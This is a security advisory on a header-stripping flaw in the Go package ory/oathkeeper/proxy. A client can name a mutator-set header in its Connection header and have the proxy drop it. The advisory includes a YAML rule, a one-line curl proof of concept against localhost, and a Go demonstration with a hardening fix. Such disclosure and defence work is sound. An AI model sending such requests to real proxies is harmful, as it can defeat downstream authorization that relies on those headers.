HTTP Request Smuggling Affecting github.com/ory/oathkeeper/proxy package, versions <0.40.3


Severity: medium (CVSS v3.1 assessment made by Snyk's Security Team)

  • Snyk ID: SNYK-GOLANG-GITHUBCOMORYOATHKEEPERPROXY-5488419
  • published: 28 Apr 2023
  • disclosed: 26 Apr 2023
  • credit: viters

Introduced: 26 Apr 2023

CVE: not available. CWE-444

How to fix?

Upgrade github.com/ory/oathkeeper/proxy to version 0.40.3 or higher.

Overview

github.com/ory/oathkeeper/proxy is an Identity & Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules.

Affected versions of this package are vulnerable to HTTP Request Smuggling (CWE-444). The header mutator adds its headers to the request before the request is forwarded, and the proxy then removes every header whose name is listed in the request's Connection header, as hop-by-hop header handling (RFC 7230 §6.1) requires; in Go's net/http/httputil reverse proxy this removal runs after the Director, i.e. after the mutators. A client can therefore drop a header set by the header mutator simply by naming that header in the Connection header of its own request, and downstream services that rely on the presence of such headers can be exploited.

PoC

# Access rule: anonymous authentication, allow-all authorization, and a header
# mutator that stamps the subject onto the forwarded request.
- id: 'example'
  upstream:
    url: 'https://example.com'
  match:
    url: 'http://127.0.0.1:4455/'
    methods:
      - GET
  authenticators:
    - handler: anonymous
  authorizer:
    handler: allow
  mutators:
    - handler: header
      config:
        headers:
          # The template must be quoted: an unquoted "{{" is a YAML flow mapping.
          X-Subject: "{{ .Subject }}"

Request that names the mutator's header as hop-by-hop:

curl -H "Connection: x-subject" http://127.0.0.1:4455/

The X-Subject header never reaches the upstream server: it is dropped entirely, even though the rule's header mutator set it. If the downstream server handles a request without that header in an unexpected way, an attacker can exploit this, assuming they know or can guess the internal header name.
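The mechanism and one way to close it, as an added Go example that is not oathkeeper's code and not part of the original advisory: a minimal httputil.ReverseProxy whose Director plays the header mutator's role, an in-process upstream that records what actually arrives, and a scrubConnection step that strips only the Connection tokens naming proxy-set headers. The header name X-Subject comes from the PoC above; the subject value "alice", the function names scrubConnection, newProxy and probe, and the hardening itself are assumptions for this example and not necessarily what 0.40.3 ships.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
	"sync"
)

// subjectHeader stands in for the header an oathkeeper header mutator would
// add; the name and the subject value "alice" below are chosen for this example.
const subjectHeader = "X-Subject"

// upstream records the headers of the last request it received behind the proxy.
type upstream struct {
	mu   sync.Mutex
	last http.Header
}

func (u *upstream) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	u.mu.Lock()
	u.last = r.Header.Clone()
	u.mu.Unlock()
	w.WriteHeader(http.StatusOK)
}

// scrubConnection removes from the Connection header every token that names a
// header the proxy itself sets, so a client cannot declare those headers
// hop-by-hop. Other tokens (e.g. "upgrade", "keep-alive") are kept intact.
func scrubConnection(h http.Header, protected ...string) {
	skip := make(map[string]bool, len(protected))
	for _, p := range protected {
		skip[strings.ToLower(p)] = true
	}
	var kept []string
	for _, v := range h.Values("Connection") {
		for _, tok := range strings.Split(v, ",") {
			tok = strings.TrimSpace(tok)
			if tok != "" && !skip[strings.ToLower(tok)] {
				kept = append(kept, tok)
			}
		}
	}
	h.Del("Connection")
	if len(kept) > 0 {
		h.Set("Connection", strings.Join(kept, ", "))
	}
}

// newProxy builds a reverse proxy whose Director plays the mutator's role and
// stamps the subject onto the request. httputil.ReverseProxy removes the
// headers named in Connection only after the Director returns, so without
// hardening the freshly added header is stripped again on the client's say-so.
func newProxy(target *url.URL, hardened bool) *httputil.ReverseProxy {
	return &httputil.ReverseProxy{
		Director: func(req *http.Request) {
			req.URL.Scheme = target.Scheme
			req.URL.Host = target.Host
			req.Host = target.Host
			if hardened {
				scrubConnection(req.Header, subjectHeader)
			}
			req.Header.Set(subjectHeader, "alice") // constructed subject
		},
	}
}

// probe sends one GET through a proxy built with the given hardening flag,
// carrying the attacker-controlled Connection value (empty means none), and
// reports whether the upstream received the subject header.
func probe(hardened bool, connectionValue string) (bool, error) {
	up := &upstream{}
	upSrv := httptest.NewServer(up)
	defer upSrv.Close()
	target, _ := url.Parse(upSrv.URL) // httptest URLs always parse
	proxySrv := httptest.NewServer(newProxy(target, hardened))
	defer proxySrv.Close()

	req, err := http.NewRequest(http.MethodGet, proxySrv.URL+"/", nil)
	if err != nil {
		return false, err
	}
	if connectionValue != "" {
		req.Header.Set("Connection", connectionValue)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return false, err
	}
	resp.Body.Close()

	up.mu.Lock()
	defer up.mu.Unlock()
	_, present := up.last[subjectHeader]
	return present, nil
}

func main() {
	for _, c := range []struct{ hardened bool; conn string }{{false, ""}, {false, "x-subject"}, {true, "x-subject"}} {
		got, err := probe(c.hardened, c.conn)
		fmt.Printf("hardened=%v Connection=%q -> %s arrived: %v (err=%v)\n", c.hardened, c.conn, subjectHeader, got, err)
	}
}
```

Run as a plain program, the three probes show the header arriving with no Connection header, vanishing once the client sends "Connection: x-subject" against the unhardened proxy, and surviving against the hardened one. Deleting the whole Connection header in the Director would also work for plain requests, but it would break WebSocket proxying, which relies on the "upgrade" token surviving until the proxy inspects it; scrubbing only the protected names avoids that.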
